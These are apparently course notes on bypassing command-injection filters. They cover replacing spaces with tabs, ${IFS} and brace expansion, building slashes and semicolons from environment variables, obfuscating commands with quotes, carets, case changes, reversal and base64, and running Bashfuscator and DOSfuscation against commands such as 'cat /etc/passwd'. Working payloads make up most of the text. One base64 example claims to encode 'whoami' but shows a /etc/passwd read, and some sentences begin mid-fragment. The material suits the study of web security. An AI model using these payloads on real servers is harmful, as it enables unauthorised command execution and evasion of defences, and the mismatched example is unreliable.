# Space / Special Characters
## Bypassing Space Filters
So, as we did before, let us only add the next character (which is a space) and see if it caused the denied request. As we can see, the space character is indeed blacklisted as well.

To discover more space filter bypasses, check out the [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space) page on writing commands without spaces.
#### Using Tabs
Using tabs (%09) instead of spaces is a technique that may work, as both Linux and Windows accept commands with tabs between arguments, and they are executed the same. So, let us try to use a tab instead of the space character (`127.0.0.1%0a%09`) and see if our request is accepted.
#### Using $IFS
Using the ($IFS) Linux Environment Variable may also work since its default value is a space and a tab.

So, if we use `${IFS}` where the spaces should be, the variable should be automatically replaced with a space, and our command should work.

Let us use `${IFS}` and see if it works (`127.0.0.1%0a${IFS}`).
#### Using Brace Expansion
we can use the `Bash Brace Expansion` feature, which automatically adds spaces between arguments wrapped between braces.
We can utilize the same method in command injection filter bypasses, by using brace expansion on our command arguments, like (`127.0.0.1%0a{ls,-la}`)
## Linux
One such technique we can use for replacing slashes (`or any other character`) is through `Linux Environment Variables` like we did with `${IFS}`. While `${IFS}` is directly replaced with a space, there's no such environment variable for slashes or semi-colons. However, these characters may be used in an environment variable, and we can specify `start` and `length` of our string to exactly match this character.

For example, if we look at the `$PATH` environment variable in Linux, it may look something like:
```shell-session
echo ${PATH}

/usr/local/bin:/usr/bin:/bin:/usr/games
```

So, if we start at the `0` character, and only take a string of length `1`, we will end up with only the `/` character, which we can use in our payload:
```shell-session
echo ${PATH:0:1}

/
```
> **Note:** When we use the above command in our payload, we will not add `echo`, as we are only using it in this case to show the outputted character.

We can do the same with the `$HOME` or `$PWD` environment variables as well. We can also use the same concept to get a semi-colon character, to be used as an injection operator. For example, the following command gives us a semi-colon:
```shell-session
echo ${LS_COLORS:10:1}

;
```
## Windows
The same concept works on Windows as well.

, to produce a slash in `Windows Command Line (CMD)`, we can `echo` a Windows variable (`%HOMEPATH%` -> `\Users\htb-student`), and then specify a starting position (`~6` -> `\htb-student`), and finally specifying a negative end position, which in this case is the length of the username `htb-student` (`-11` -> `\`) :
```cmd-session
echo %HOMEPATH:~6,-11%

\
```

We can achieve the same thing using the same variables in `Windows PowerShell`.
```powershell-session
$env:HOMEPATH[0]

\
```
We can also use the `Get-ChildItem Env:` PowerShell command to print all environment variables and then pick one of them to produce a character we need.
## Character Shifting
the following Linux command shifts the character we pass by `1`. So, all we have to do is find the character in the ASCII table that is just before our needed character (we can get it with `man ascii`), then add it instead of `[` in the below example.
```shell-session
man ascii
echo $(tr '!-}' '"-~'<<<[)

\
```
# Bypassing Blacklisted Commands
A basic command blacklist filter in `PHP` would look like the following:
```php
$blacklist = ['whoami', 'cat', ...SNIP...];
foreach ($blacklist as $word) {
    if (strpos('$_POST['ip']', $word) !== false) {
        echo "Invalid input";
    }
}
```
## Linux & Windows
One very common and easy obfuscation technique is inserting certain characters within our command that are usually ignored by command shells like `Bash` or `PowerShell` and will execute the same command as if they were not there.

The easiest to use are quotes, and they work on both Linux and Windows servers. For example, if we want to obfuscate the `whoami` command, we can insert single quotes between its characters, as follows:
```shell-session
w'h'o'am'i
```
- The same works with double-quotes as well.
- We cannot mix types of quotes and the number of quotes must be even.
## Linux Only
We can insert a few other Linux-only characters in the middle of commands, and the `bash` shell would ignore them and execute the command. These characters include the backslash `\` and the positional parameter character `$@`.

This works exactly as it did with the quotes, but in this case, `the number of characters do not have to be even`, and we can insert just one of them if we want to:
```bash
who$@ami
w\ho\am\i
```
> Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character.
## Windows Only
There are also some Windows-only characters we can insert in the middle of commands that do not affect the outcome, like a caret (`^`) character, as we can see in the following example:
```cmd-session
who^ami

21y4d
```
# Advanced Command Obfuscation
One command obfuscation technique we can use is case manipulation, like inverting the character cases of a command (e.g. `WHOAMI`) or alternating between cases (e.g. `WhOaMi`).

If we are dealing with a Windows server, we can change the casing of the characters of the command and send it.

However, when it comes to Linux and a bash shell, which are case-sensitive, as mentioned earlier, we have to get a bit creative and find a command that turns the command into an all-lowercase word.

One working command we can use is the following:
```shell-session
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

21y4d
```
- This command uses `tr` to replace all upper-case characters with lower-case characters, which results in an all lower-case character command
> If the command is still getting blocked, keep replacing the characters that are blocked (such as the space) to avoid keep on getting blocked.

There are many other commands we may use for the same purpose, like the following:
```bash
$(a="WhOaMi";printf %s "${a,,}")
```
## Reversed Commands
In this case, we will be writing `imaohw` instead of `whoami` to avoid triggering the blacklisted command.

First, we'd have to get the reversed string of our command in our terminal, as follows:
```bash 
echo 'whoami' | rev
imaohw
```

Then, we can execute the original command by reversing it back in a sub-shell (`$()`), as follows:
```bash
$(rev<<<'imaohw')

21y4d
```

The same can be applied in `Windows.` We can first reverse a string, as follows:
```powershell-session
"whoami"[-1..-20] -join ''

imaohw
```

We can now use the below command to execute a reversed string with a PowerShell sub-shell (`iex "$()"`), as follows:
```powershell-session
iex "$('imaohw'[-1..-20] -join '')"

21y4d
```
## Encoded Commands
helpful for commands containing filtered characters or characters that may be URL-decoded by the server.

Instead of copying an existing command online, we will try to create our own unique obfuscation command this time. This way, it is much less likely to be denied by a filter or a WAF. The command we create will be unique to each case, depending on what characters are allowed and the level of security on the server.

We can utilize various encoding tools, like `base64` (for b64 encoding) or `xxd` (for hex encoding). Let's take `base64` as an example.

First, we'll encode the payload we want to execute (which includes filtered characters):
```bash
echo -n 'whoami' | base64

Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==
```

Now we can create a command that will decode the encoded string in a sub-shell (`$()`), and then pass it to `bash` to be executed (i.e. `bash<<<`), as follows:
```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
```
> Tip: Note that we are using `<<<` to avoid using a pipe `|`, which is a filtered character.

- Even if some commands were filtered, like `bash` or `base64`, we could bypass that filter with the techniques we discussed in the previous section

We use the same technique with Windows as well. 

First, we need to base64 encode our string, as follows:
```powershell-session
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

dwBoAG8AYQBtAGkA
```

We may also achieve the same thing on Linux, but we would have to convert the string from `utf-8` to `utf-16` before we `base64` it, as follows:
```bash
echo -n whoami | iconv -f utf-8 -t utf-16le | base64

dwBoAG8AYQBtAGkA
```

Finally, we can decode the b64 string and execute it with a PowerShell sub-shell (`iex "$()"`), as follows:
```powershell-session
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

21y4d
```
# Evasion Tools
If we are dealing with advanced security tools, we may not be able to use basic, manual obfuscation techniques. In such cases, it may be best to resort to automated obfuscation tools.
## Linux (Bashfuscator)
utilize for obfuscating bash commands is [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator). We can clone the repository from GitHub and then install its requirements, as follows:
```shell-session
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
```

Once we have the tool set up, we can start using it from the `./bashfuscator/bin/` directory.

We can start by simply providing the command we want to obfuscate with the `-c` flag:
```bash
./bashfuscator -c 'cat /etc/passwd'
```

However, running the tool this way will randomly pick an obfuscation technique, which can output a command length ranging from a few hundred characters to over a million characters! So, we can use some of the flags from the help menu to produce a shorter and simpler obfuscated command, as follows:
```bash
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
```

We can now test the outputted command with `bash -c ''`, to see whether it does execute the intended command:
```bash
bash -c 'eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
```
## Windows (DOSfuscation)
There is also a very similar tool that we can use for Windows called [DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation). Unlike `Bashfuscator`, this is an interactive tool, as we run it once and interact with it to get the desired obfuscated command. We can once again clone the tool from GitHub and then invoke it through PowerShell, as follows:
```powershell-session
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
```

Once we are set, we can start using the tool, as follows:
```powershell-session
SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
encoding
```

Finally, we can try running the obfuscated command on `CMD`, and we see that it indeed works as expected.